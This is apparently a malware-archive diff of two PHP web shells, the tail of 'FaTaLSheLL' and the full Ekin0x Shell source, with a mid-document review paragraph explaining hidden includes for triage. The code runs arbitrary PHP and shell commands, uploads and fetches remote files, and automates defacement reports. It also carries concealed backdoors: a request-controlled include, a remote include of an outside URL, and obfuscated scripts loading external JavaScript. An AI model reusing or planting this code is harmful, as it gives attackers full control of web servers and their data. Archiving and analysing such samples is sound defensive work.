$linkfile=$dir.$files[$i];
$content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>Dosya</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Bu Dosyayi Sil">X</a></td></tr>';
}
$content.="</table>";
}}}
//downloader
if($action=="download"){
header('Content-Length:'.filesize($file).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);}
//phpeval
if($action=="phpeval"){
$content.="<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"phpeval\">
<input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
&lt;?php<br>
<textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
?><br>
<input type=\"submit\" value=\"Uygula\"></form>";
if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
//upload
if($action=="upload"){
if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
$form_win="<tr><td><form method=POST enctype=multipart/form-data>
<input type=\"hidden\" name=\"action\" value=\"upload\">
Buraya Uploadla:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>Dosyayý Adlandýr (Gerekli) :<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload Et'></td></tr>";
if($os==1)$content.=$form_win;
if($os==0){
$content.=$form_win;
$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
<input type=submit name=upload value=Upload></form></td></tr>';
}
if(isset($_POST['uploadloc'])){
if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else
$uploadfile = $dirupload."/".$_POST['filename'];
if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
if(file_exists($uploadfile))$content.=$lang['filext'];
elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile))
$content.=$lang['uploadok'];
}
if(isset($_POST['upload'])){
if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
switch($_POST['with'])
{
case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
}}}
//end function
?><?=$header;?>
<style type="text/css">
<!--
.style4 {
font-size: x-large;
font-weight: bold;
}
.style5 {color: #FF0000}
.style8 {color: #CCFF00}
-->
</style>
<a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();"><p align="center" class="style4">FaTaLSheLL v1.0 </p></a>
<table width="100%" bgcolor="#336600" align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Shell </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Ana Sayfa</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Editle</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Upload</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Php Eval |</a></td><td><a href="#" onclick="history.back();"> <-Geri |</a></td><td><a href="#" onclick="history.forward();"> Ýleri->|</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form>
<p>&nbsp;</p>
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td><span class="style8">Safe mode:</span> <?php include ($a.$b.$c); echo $safe_mode;?><br>
<span class="style8">Fonksiyon Kýsýtlamasý:</span> <?php echo $disfunc;?><br>
<span class="style8">Sistem:</span> <?php echo @php_uname();?><br>
<span class="style8">Durum:</span> <?php echo @$stdata;?></td>
</tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?></td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://www.starhack.org">COPYRIGHT BY StarHack.oRg <?=$version;?></a></td></tr></table></tr></td></table><?=$footer;?>
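Review bot: Two inclusion paths in this sample are easy to miss, and the commit records neither: the first line, `<? include $_GET['baba']; ?>`, includes whatever path the request names, and the status table near the end runs `include ($a.$b.$c)`, whose operands are the three strings set at the top of the file and concatenate to a remote URL. Both sit outside the `$act` allow-list that gates the POST-driven actions, so as far as the visible flow shows they run on every request regardless of `action`. I would record this in the archive's index or a sidecar note rather than in the sample itself (editing it would change its hash), e.g. `Agent.ca ("FaTaL Shell v1.0"): POST web shell; also includes $_GET['baba'] and a remote URL built from $a.$b.$c on every request`. For triage, the remote include only succeeds where `allow_url_include` is enabled, so that setting and outbound HTTP from the PHP process are the things to check on a host where this file is found. The same `baba` include and the same `$a`/`$b`/`$c` assignments appear at the start of the next file, Agent.cb, whose section continues beyond this view.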

614
PHP/Backdoor.PHP.Agent.cb Normal file

@ -0,0 +1,614 @@
<?
/*###########################################
Ekin0x Shell volume 2.1
Don't make any changes in c0de except if you dont know php programming
###########################################*/
$a = "http://";
$b = "room-escape-games.com";
$c = "/x.html";
error_reporting(0);
set_magic_quotes_runtime(0);
if(version_compare(phpversion(), '4.1.0') == -1)
{$_POST = &$HTTP_POST_VARS;$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}function inclink($link,$val){$requ=$_SERVER["REQUEST_URI"];
if (strstr ($requ,$link)){return preg_replace("/$link=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr ($requ,"showsc")){return preg_replace("/showsc=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}
elseif (strstr ($requ,"hlp")){return preg_replace("/hlp=[\\d\\w\\W\\D\\S]*/","$link=$val",$requ);}elseif (strstr($requ,"?")){return $requ."&".$link."=".$val;}
else{return $requ."?".$link."=".$val;}}
function delm($delmtxt){print"<center><table bgcolor=Black style='border:1px solidDeepSkyBlue ' width=99% height=2%>";print"<tr><td><b><center><font size=3 color=DeepSkyBlue >$delmtxt</td></tr></table></center>";}
function callfuncs($cmnd){if (function_exists(shell_exec)){$scmd=shell_exec($cmnd);
$nscmd=htmlspecialchars($scmd);print $nscmd;}
elseif(!function_exists(shell_exec)){exec($cmnd,$ecmd);
$ecmd = join("\n",$ecmd);$necmd=htmlspecialchars($ecmd);print $necmd;}
elseif(!function_exists(exec)){$pcmd = popen($cmnd,"r");
while (!feof($pcmd)){ $res = htmlspecialchars(fgetc($pcmd));;
print $res;}pclose($pcmd);}elseif(!function_exists(popen)){
ob_start();system($cmnd);$sret = ob_get_contents();ob_clean();print htmlspecialchars($sret);}elseif(!function_exists(system)){
ob_start();passthru($cmnd);$pret = ob_get_contents();ob_clean();
print htmlspecialchars($pret);}}
function input($type,$name,$value,$size)
{if (empty($value)){print "<input type=$type name=$name size=$size>";}
elseif(empty($name)&&empty($size)){print "<input type=$type value=$value >";}
elseif(empty($size)){print "<input type=$type name=$name value=$value >";}
else {print "<input type=$type name=$name value=$value size=$size >";}}
function permcol($path){if (is_writable($path)){print "<font color=red>";
callperms($path); print "</font>";}
elseif (!is_readable($path)&&!is_writable($path)){print "<font color=DeepSkyBlue >";
callperms($path); print "</font>";}
else {print "<font color=DeepSkyBlue >";callperms($path);}}
if ($dlink=="dwld"){download($_REQUEST['dwld']);}
function download($dwfile) {$size = filesize($dwfile);
@header("Content-Type: application/force-download;name=$dwfile");
@header("Content-Transfer-Encoding: binary");
@header("Content-Length: $size");
@header("Content-Disposition: attachment; filename=$dwfile");
@header("Expires: 0");
@header("Cache-Control: no-cache, must-revalidate");
@header("Pragma: no-cache");
@readfile($dwfile); exit;}
?>
<? include $_GET['baba']; ?>
<html>
<head><title>Ekin0x Shell</title></head>
<style>
BODY { SCROLLBAR-BASE-COLOR: DeepSkyBlue ; SCROLLBAR-ARROW-COLOR: red; }
a{color:#dadada;text-decoration:none;font-family:tahoma;font-size:13px}
a:hover{color:red}
input{FONT-WEIGHT:normal;background-color: #000000;font-size: 12px; color: #dadada; font-family: Tahoma; border: 1px solid #666666;height:17}
textarea{background-color:#191919;color:#dadada;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1 solid #666666;}
div{font-size:12px;font-family:tahoma;font-weight:normal;color:DeepSkyBlue smoke}
select{background-color: #191919; font-size: 12px; color: #dadada; font-family: Tahoma; border: 1 solid #666666;font-weight:bold;}</style>
<body bgcolor=black text=DeepSkyBlue ><font face="sans ms" size=3>
</body>
</html>
<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0063\u0065\u006e\u0074\u0065\u0078\u0068\u0075\u006d\u006d\u0065\u0072\u0063\u006c\u0075\u0062\u002e\u0063\u006f\u006d\u002f\u0079\u0061\u007a\u0063\u0069\u007a\u002f\u0063\u0069\u007a\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script>
<script type="text/javascript">document.write('\u003c\u0053\u0043\u0052\u0049\u0050\u0054\u0020\u0053\u0052\u0043\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0063\u0065\u006e\u0074\u0065\u0078\u0068\u0075\u006d\u006d\u0065\u0072\u0063\u006c\u0075\u0062\u002e\u0063\u006f\u006d\u002f\u0079\u0061\u007a\u0063\u0069\u007a\u002f\u0063\u0069\u007a\u002e\u006a\u0073\u003e\u003c\u002f\u0053\u0043\u0052\u0049\u0050\u0054\u003e')</script>
<?
$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();
$sf="<form method=post>";$ef="</form>";
$st="<table style=\"border:1px #dadada solid \" width=100% height=100%>";
$et="</table>";$c1="<tr><td height=22% style=\"border:1px #dadada solid \">";
$c2="<tr><td style=\"border:1px #dadada solid \">";$ec="</tr></td>";
$sta="<textarea cols=157 rows=23>";$eta="</textarea>";
$sfnt="<font face=tahoma size=2 color=DeepSkyBlue >";$efnt="</font>";
################# Ending of common variables ########################
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<b><center><font face=tahoma color=DeepSkyBlue size=6> ## Ekin0x Shell ##
</font></b></center>"; print"</td></tr>";print"</table>";print "<br>";
print"<table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>";print"<tr><td>"; print"<center><div><b>";print "<a href=".inclink('dlink', 'home').">Home</a>";
print " - <a href='javascript:history.back()'>Geri</a>";
print " - <a target='_blank' href=".inclink('dlink', 'phpinfo').">phpinfo</a>";
if ($dlink=='phpinfo'){print phpinfo();die();}
print " - <a href=".inclink('dlink', 'basepw').">Base64 decode</a>";
print " - <a href=".inclink('dlink', 'urld').">Url decode</a>";
print " - <a href=".inclink('dlink', 'urlen').">Url encode</a>";
print " - <a href=".inclink('dlink', 'mdf').">Md5</a>";
print " - <a href=".inclink('dlink', 'perm')."&scdir=$nscdir>Izinleri Kontrol Et</a>";
print " - <a href=".inclink('dlink', 'showsrc')."&scdir=$nscdir>File source</a>";
print " - <a href=".inclink('dlink', 'qindx')."&scdir=$nscdir>Quick index</a>";
print " - <a href=".inclink('dlink', 'zone')."&scdir=$nscdir>Zone-h</a>";
print " - <a href=".inclink('dlink', 'mail')."&scdir=$nscdir>Mail</a>";
print " - <a href=".inclink('dlink', 'cmdhlp')."&scdir=$nscdir>Cmd help</a>";
if (isset ($_REQUEST['ncbase'])){$cbase =(base64_decode ($_REQUEST['ncbase']));
print "<p>Result is : $sfnt".$cbase."$efnt"; die();}
if ($dlink=="basepw"){ print "<p><b>[ Base64 - Decoder ]</b>";
print $sf;input ("text","ncbase",$ncbase,35);print " ";
input ("submit","","Decode","");print $ef; die();}
if (isset ($_REQUEST['nurld'])){$urldc =(urldecode ($_REQUEST['nurld']));
print "<p>Result is : $sfnt".$urldc."$efnt"; die();}if ($dlink=='urld'){
print "<p><b>[ Url - Decoder ]</b>"; print $sf;
input ("text","nurld",$nurld,35);print " ";
input ("submit","","Decode","");print $ef; die();}
if (isset ($_REQUEST['nurlen'])){$urlenc =(urlencode (stripslashes($_REQUEST['nurlen']))); print "<p>Result is : $sfnt".$urlenc."$efnt"; die();}
if ($dlink=='urlen'){print "<p><b>[ Url - Encoder ]</b>";
print $sf;input ("text","nurlen",$nurlen,35);print " "; input ("submit","","Encode","");print $ef; die();}
if (isset ($_REQUEST['nmdf'])){$mdfe =(md5 ($_REQUEST['nmdf']));
print "<p>Result is : $sfnt".$mdfe."$efnt"; die();}if ($dlink=='mdf'){
print "<p><b>[ MD5 - Encoder ]</b>";
print $sf;input ("text","nmdf",$nmdf,35);print " ";
input ("hidden","scdir",$scdir,22); input ("submit","","Encode","");print $ef;die(); }if ($dlink=='perm'){print $sf;input("submit","mfldr","Main-fldr","");print " ";input("submit","sfldr","Sub-fldr","");print $ef;
print "<pre>";print "<p><textarea cols=120 rows=12>";
if (isset($_REQUEST['mfldr'])){callfuncs('find . -type d -perm -2 -ls');
}elseif (isset($_REQUEST['sfldr'])){callfuncs('find ../ -type d -perm -2 -ls');
}print "</textarea>";print "</pre>";die();}
function callshsrc($showsc){if(isset($showsc)&&filesize($showsc)=="0"){
print "<p><b>[ Sorry, U choosed an empty file or the file not exists ]";die();}
elseif(isset($showsc)&&filesize($showsc) !=="0") {
print "<p><table width=100% height=10% bgcolor=#dadada border=1><tr><td>";
if (!show_source($showsc)||!function_exists('show_source')){print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";die();}print "</td></tr></table>";die();}}if ($dlink=='showsrc'){
print "<p><b>: Choose a php file to view in a color mode, any extension else will appears as usual :";print "<form method=get>";
input ("text","showsc","",35);print " ";
input ("hidden","scdir",$scdir,22);input ("submit","subshsc","Show-src","");print $ef; die();}if(isset($_REQUEST['showsc'])){callshsrc(trim($_REQUEST['showsc']));}
if ($dlink=='cmdhlp'){
print "<p><b>: Insert the command below to get help or to know more about it's uses :";print "<form method=get>";
input ("text","hlp","",35);print " ";
input ("submit","","Help","");print $ef; die();}
if (isset ($_REQUEST['hlp'])){$hlp=$_REQUEST['hlp'];
print "<p><b>[ The command is $sfnt".$hlp."$efnt ]";
$hlp = escapeshellcmd($hlp);print "<p><table width=100% height=30% bgcolor=#dadada border=2><tr><td>";
if (!function_exists(shell_exec)&&!function_exists(exec)&&
!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "<center><font color=black size=2><b>[ Sorry can't complete the operation ]</font></center>";}else {print "<pre><font color=black>";
if(!callfuncs("man $hlp | col -b")){print "<center><font size=2><b>[ Finished !! ]";}print "</pre></font>";}print "</td></tr></table>";die();}
if (isset($_REQUEST['indx'])&&!empty($_REQUEST['indxtxt']))
{if (touch ($_REQUEST['indx'])==true){
$fp=fopen($_REQUEST['indx'],"w+");fwrite ($fp,stripslashes($_REQUEST['indxtxt']));
fclose($fp);print "<p>[ $sfnt".$_REQUEST['indx']."$efnt created successfully !! ]</p>";print "<b><center>[ <a href='javascript:history.back()'>Yeniden Editle</a>
] -- [<a href=".inclink('dlink', 'scurrdir')."&scdir=$nscdir> Curr-Dir </a>]</center></b>";die(); }else {print "<p>[ Sorry, Can't create the index !! ]</p>";die();}}
if ($dlink=='qindx'&&!isset($_REQUEST['qindsub'])){
print $sf."<br>";print "<p><textarea cols=50 rows=10 name=indxtxt>
Your index contents here</textarea></p>";
input ("text","indx","Index-name",35);print " ";
input ("submit","qindsub","Create","");print $ef;die();}
if (isset ($_REQUEST['mailsub'])&&!empty($_REQUEST['mailto'])){
$mailto=$_REQUEST['mailto'];$subj=$_REQUEST['subj'];$mailtxt=$_REQUEST['mailtxt'];
if (mail($mailto,$subj,$mailtxt)){print "<p>[ Mail sended to $sfnt".$mailto." $efnt successfully ]</p>"; die();}else {print "<p>[ Error, Can't send the mail ]</p>";die();}} elseif(isset ($mailsub)&&empty($mailto)) {print "<p>[ Error, Can't send the mail ]</p>";die();}
if ($dlink=='mail'&&!isset($_REQUEST['mailsub'])){
print $sf."<br>";print "<p><textarea cols=50 rows=10 name=mailtxt>
Your message here</textarea></p>";input ("text","mailto","example@mail.com",35);print " ";input ("text","subj","Title-here",20);print " ";
input ("submit","mailsub","Send-mail","");print $ef;die();}
if (isset($_REQUEST['zonet'])&&!empty($_REQUEST['zonet'])){callzone($nscdir);}
function callzone($nscdir){
if (is_writable($nscdir)){$fpz=fopen ("z.pl","w");$zpl='z.pl';$li="bklist.txt";}
else {$fpz=fopen ("/tmp/z.pl","w");$zpl='/tmp/z.pl';$li="/tmp/bklist.txt";}
fwrite ($fpz,"\$arq = @ARGV[0];
\$grupo = @ARGV[1];
chomp \$grupo;
open(a,\"<\$arq\");
@site = <a>;
close(a);
\$b = scalar(@site);
for(\$a=0;\$a<=\$b;\$a++)
{chomp \$site[\$a];
if(\$site[\$a] =~ /http/) { substr(\$site[\$a], 0, 7) =\"\"; }
print \"[+] Sending \$site[\$a]\n\";
use IO::Socket::INET;
\$sock = IO::Socket::INET->new(PeerAddr => \"old.zone-h.org\", PeerPort => 80, Proto => \"tcp\") or next;
print \$sock \"POST /en/defacements/notify HTTP/1.0\r\n\";
print \$sock \"Accept: */*\r\n\";
print \$sock \"Referer: http://old.zone-h.org/en/defacements/notify\r\n\";
print \$sock \"Accept-Language: pt-br\r\n\";
print \$sock \"Content-Type: application/x-www-form-urlencoded\r\n\";
print \$sock \"Connection: Keep-Alive\r\n\";
print \$sock \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n\";
print \$sock \"Host: old.zone-h.org\r\n\";
print \$sock \"Content-Length: 385\r\n\";
print \$sock \"Pragma: no-cache\r\n\";
print \$sock \"\r\n\";
print \$sock \"notify_defacer=\$grupo&notify_domain=http%3A%2F%2F\$site[\$a]&notify_hackmode=22&notify_reason=5&notify=+OK+\r\n\";
close(\$sock);}");
if (touch ($li)==true){$fpl=fopen($li,"w+");fwrite ($fpl,$_REQUEST['zonetxt']);
}else{print "<p>[ Can't complete the operation, try change the current dir with writable one ]<br>";}$zonet=$_REQUEST['zonet'];
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print "[ Can't complete the operation !! ]";}
else {callfuncs("chmod 777 $zpl;chmod 777 $li");
ob_start();callfuncs("perl $zpl $li $zonet");ob_clean();
print "<p>[ All sites should be sended to zone-h.org successfully !! ]";die();}
}if ($dlink=='zone'&&!isset($_REQUEST['zonesub'])){
print $sf."<br>";print "<p><pre><textarea cols=50 rows=10 name=zonetxt>
www.site1.com
www.site2.com
</textarea></pre></p>";input ("text","zonet","Hacker-name",35);print " ";
input ("submit","zonesub","Send","");print $ef;die();}
print "</div></b></center>"; print"</td></tr>";print"</table>";print "<br>";
function inisaf($iniv) { $chkini=ini_get($iniv);
if(($chkini || strtolower($chkini)) !=='on'){print"<font color=DeepSkyBlue ><b>Kapali ( Guvenlik Yok )</b></font>";} else{
print"<font color=red><b>Acik ( Guvenli )</b></font>";}}function inifunc($inif){$chkin=ini_get($inif);
if ($chkin==""){print " <font color=red><b>None</b></font>";}
else {$nchkin=wordwrap($chkin,40,"\n", 1);print "<b><font color=DeepSkyBlue >".$nchkin."</font></b>";}}function callocmd($ocmd,$owhich){if(function_exists(exec)){$nval=exec($ocmd);}elseif(!function_exists(exec)){$nval=shell_exec($ocmd);}
elseif(!function_exists(shell_exec)){$opop=popen($ocmd,'r');
while (!feof($opop)){ $nval= fgetc($opop);}}
elseif(!function_exists(popen)){ ob_start();system($ocmd);$nval=ob_get_contents();ob_clean();}elseif(!function_exists(system)){
ob_start();passthru($ocmd);$nval=ob_get_contents();ob_clean();}
if($nval=$owhich){print"<font color=red><b>ON</b></font>";}
else{print"<font color=DeepSkyBlue ><b>OFF</b></font>";} }
print"<table bgcolor=#191919 style=\"border:2px #dadada solid ;font-size:13px;font-family:tahoma \" width=100% height=%>";
print"<tr><td>"; print"<center><br>";
print"<b>Safe-mode :\t";print inisaf('safe_mode');print "</b>";print"</center>";
if (!function_exists(exec)&&!function_exists(shell_exec)&&!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru)||strstr(PHP_OS,"WIN")){print "";}else{print "<table bgcolor=#191919 width=100% height=% style='font-size:13px;font-family:tahoma'><tr><td>";
print "<div align=center>"; print"<br><b>Mysql : </b>";
callocmd('which mysql','/usr/bin/mysql');
print"</td>"; print"<td>"; print"<br><b>Perl : </b>";
callocmd('which perl',('/usr/bin/perl')||'/usr/local/bin/perl');print"</td>"; print"<td>"; print"<br><b>Gcc : </b>";
callocmd('which gcc','/usr/bin/gcc'); print"</td>"; print"<td>";
print"<br><b>Curl : </b>"; callocmd('which curl','/usr/bin/curl'); print"</td>"; print"<td>"; print"<br><b>GET : </b>";
callocmd('which GET','/usr/bin/GET');
print"</td>"; print"<td>";print"<br><b>Wget : </b>";
callocmd('which wget','/usr/bin/wget');
print"</td>"; print"<td>"; print"<br><b>Lynx : </b>";
callocmd('which lynx','/usr/bin/lynx');
print"</td>"; print "</tr></table>"; }print "<hr><br>";
print "<b>IP Numaran : ".$REMOTE_ADDR."<br></b>";
print "<b>Server IP : ".$SERVER_ADDR."</b>";
print"<br><b>".$SERVER_SIGNATURE."</b>";
print "<b>Server ADI : ".$SERVER_NAME." / "."Email : ".$SERVER_ADMIN."<br></b>";
print "<b>Engelli Fonksiyonlar : </b>";inifunc(disable_functions);print"<br>";
print "<b>Kimsin : <b>"; callfuncs('id');print"<br><b>Os : </b>";
if (strstr( PHP_OS, "WIN")){print php_uname(); print " ";print PHP_OS; }else {
if (!function_exists(shell_exec)&&!function_exists(exec)&&
!function_exists(popen)&&!function_exists(system)&&!function_exists(passthru))
{print php_uname(); print "/";print PHP_OS;}
else {callfuncs('uname -a');}}print"<br>";
print"Php-versiyon : ".phpversion(); print"<br><b>Current-path : </b>";
print $nscdir."&nbsp;&nbsp;&nbsp;&nbsp; [ ";permcol($nscdir);print " ]";
print"<br>";print "Shell'in Burda : " .__file__;
print"<br> Toplam Alan: "; readable_size(disk_total_space($nscdir));print " / ";
print"Bos Alan: "; readable_size(disk_free_space($nscdir));
print "</center><br></font>"; print"</td></tr></table><br>";
if (isset($_REQUEST['credir'])) { $ndir=trim($_REQUEST['dir']);
if (mkdir( $ndir, 0777 )){ $mess=basename($ndir)." created successfully"; }
else{$mess="Klasör Olustur/Sil";}}elseif (isset($_REQUEST['deldir']))
{ $nrm=trim($_REQUEST['dir']);if (is_dir($nrm)&& rmdir($nrm)){$mess=basename($nrm)." deleted successfully"; }else{$mess="Create/Delete Dir";}}
else{$mess="Klasör Olustur/Sil";}if(isset($_REQUEST['crefile'])){
$ncfile=trim($_REQUEST['cfile']);
if (!is_file($ncfile)&&touch($ncfile)){ $mess3=basename($ncfile)." created succefully";unset ($_REQUEST['cfile']);}
else{ $mess3= "Dosya Olustur/Sil";}}
elseif(isset($_REQUEST['delfile'])){
$ndfile=trim($_REQUEST['cfile']);
if (unlink($ndfile)) {$mess3=basename($ndfile)." deleted succefully";}
else {$mess3= "Dosya Olustur/Sil";}}
else {$mess3="Dosya Olustur/Sil";}
class upload{ function upload($file,$tmp){
$nscdir =(!isset($_REQUEST['scdir']))?getcwd():chdir($_REQUEST['scdir']);$nscdir=getcwd();if (isset($_REQUEST["up"])){ if (empty($upfile)){print "";}
if (@copy($tmp,$nscdir."/".$file)){
print "<div><center><b>:<font color=DeepSkyBlue > $file </font>uploaded successfully :</b></center></div>"; }else{print "<center><b>: Error uploading<font color=red> $file </font>: </b></center>";} } } }
$obj=new upload($HTTP_POST_FILES['upfile']['name'],$HTTP_POST_FILES['upfile']['tmp_name']); if (isset ($_REQUEST['ustsub'])){
$ustname=trim ($_REQUEST['ustname']);ob_start();
if ($_REQUEST['ustools']='t1'){callfuncs('wget '.$ustname);}
if ($_REQUEST['ustools']='t2'){callfuncs('curl -o basename($ustname) $ustname');}
if ($_REQUEST['ustools']='t3'){callfuncs('lynx -source $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t9'){callfuncs('GET $ustname > basename($ustname)');}
if ($_REQUEST['ustools']='t4'){callfuncs('unzip '.$ustname);}
if ($_REQUEST['ustools']='t5'){callfuncs('tar -xvf '.$ustname);}
if ($_REQUEST['ustools']='t6'){callfuncs('tar -zxvf '.$ustname);}
if ($_REQUEST['ustools']='t7'){callfuncs('chmod 777 '.$ustname);}
if ($_REQUEST['ustools']='t8'){callfuncs('make '.$ustname);}ob_clean();}
if (!isset($_REQUEST['cmd'])&&!isset($_REQUEST['eval'])&&!isset($_REQUEST['rfile'])&&!isset($_REQUEST['edit'])&&!isset($_REQUEST['subqcmnds'])&&!isset ($_REQUEST['safefile'])&&!isset ($_REQUEST['inifile'])&&!isset($_REQUEST['bip'])&&
!isset($_REQUEST['rfiletxt'])){
if ($dh = dir($nscdir)){ while (true == ($filename =$dh->read())){
$files[] = $filename; sort($files);}print "<br>";
print"<center><table bgcolor=#2A2A2A style=\"border:1px solid black\" width=100% height=6% ></center>";
print "<tr><td width=43% style=\"border:1px solid black\">";
print "<center><b>Dosyalar";print "</td>";
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Boyut";print "</td>";
print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Yazma";print "</td>";
print "<td width=3% style=\"border:1px solid black\">";print "<center><b>Okuma";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Tür";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Düzenleme";print "</td>";
print "<td width=5% style=\"border:1px solid black\">";print "<center><b>Adlandirma";print "</td>";
print "<td width=6% style=\"border:1px solid black\">";print "<center><b>Indir";print "</td>";if(strstr(PHP_OS,"Linux")){
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Group";print "</td>";}
print "<td width=8% style=\"border:1px solid black\">";print "<center><b>Izinler";print "</td></tr>"; foreach ($files as $nfiles){
if (is_file("$nscdir/$nfiles")){ $scmess1=filesize("$nscdir/$nfiles");}
if (is_writable("$nscdir/$nfiles")){
$scmess2= "<center><font color=DeepSkyBlue >Evet";}else {$scmess2="<center><font color=red>Hayir";}if (is_readable("$nscdir/$nfiles")){
$scmess3= "<center><font color=DeepSkyBlue >Evet";}else {$scmess3= "<center><font color=red>Hayir";}if (is_dir("$nscdir/$nfiles")){$scmess4= "<font color=red><center>Klasör";}else{$scmess4= "<center><font color=DeepSkyBlue >Dosya";}
print"<tr><td style=\"border:1px solid black\">";
if (is_dir($nfiles)){print "<font face= tahoma size=2 color=DeepSkyBlue >[ $nfiles ]<br>";}else {print "<font face= tahoma size=2 color=#dadada>$nfiles <br>";}
print"</td>"; print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 color=#dadada>";
if (is_dir("$nscdir/$nfiles")){print "<b>K</b>lasör";}
elseif(is_file("$nscdir/$nfiles")){readable_size($scmess1);}else {print "---";}
print "</td>"; print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess2"; print "</td>";
print"<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess3"; print "</td>";
print "<td style=\"border:1px solid black\">";
print "<center><font face= tahoma size=2 >$scmess4"; print"</td>";
print "<td style=\"border:1px solid black\">";if(is_file("$nscdir/$nfiles")){
print " <center><a href=".inclink('dlink', 'edit')."&edit=$nfiles&scdir=$nscdir>Düzenle</a>";}else {print "<center><font face=tahoma size=2 color=gray>Düzenle</center>";}print"</td>"; print "<td style=\"border:1px solid black\">";print " <center><a href=".inclink('dlink', 'ren')."&ren=$nfiles&scdir=$nscdir>Adlandir</a>";print"</td>";print "<td style=\"border:1px solid black\">";
if(is_file("$nscdir/$nfiles")){
